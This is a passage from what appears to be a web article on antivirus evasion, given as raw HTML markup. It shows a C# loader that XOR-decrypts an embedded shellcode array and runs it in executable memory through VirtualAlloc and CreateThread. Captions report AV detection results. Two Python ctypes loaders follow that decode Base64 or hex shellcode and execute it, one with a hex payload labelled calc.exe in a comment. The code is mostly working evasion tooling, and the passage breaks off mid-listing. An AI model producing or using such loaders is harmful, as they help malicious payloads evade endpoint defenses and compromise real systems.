class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xeb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x17&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xea&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x70&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xaa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xad&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xcc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span 
class="m"&gt;0xa4&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"qing"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------&lt;/span&gt;
            &lt;span class="c1"&gt;// Decrypt the shellcode&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Encoding&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ASCII&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"aes"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedShellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Convert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------            &lt;/span&gt;
            &lt;span class="c1"&gt;// Copy decrypted shellcode to memory&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;// Invoke the shellcode&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject&lt;/span&gt;
        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fo42st6e2g58ddmqpzx4x.png" alt="Figure 13: XOR-encrypted shellcode C# loader implementation" width="800" height="522"&gt;Figure 13: XOR-encrypted shellcode C# loader implementation
  



  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0l61b53i8872cbw236l4.png" alt="Figure 14: AV detection results for XOR-encrypted shellcode" width="799" height="494"&gt;Figure 14: AV detection results for XOR-encrypted shellcode
  


&lt;p&gt;The same principles apply to other programming languages. For instance, &lt;strong&gt;Python&lt;/strong&gt; supports XOR encoding, Base64, and hexadecimal encoding, among others.&lt;/p&gt;
&lt;h4&gt;
  
  
  Python Base64 Example (k8gege):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#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
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RtlMoveMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                     &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ht&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                         &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ht&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Python Hexadecimal Example:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="c1"&gt;#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hex&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x3000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                          &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;c_int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nf"&gt;from_buffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

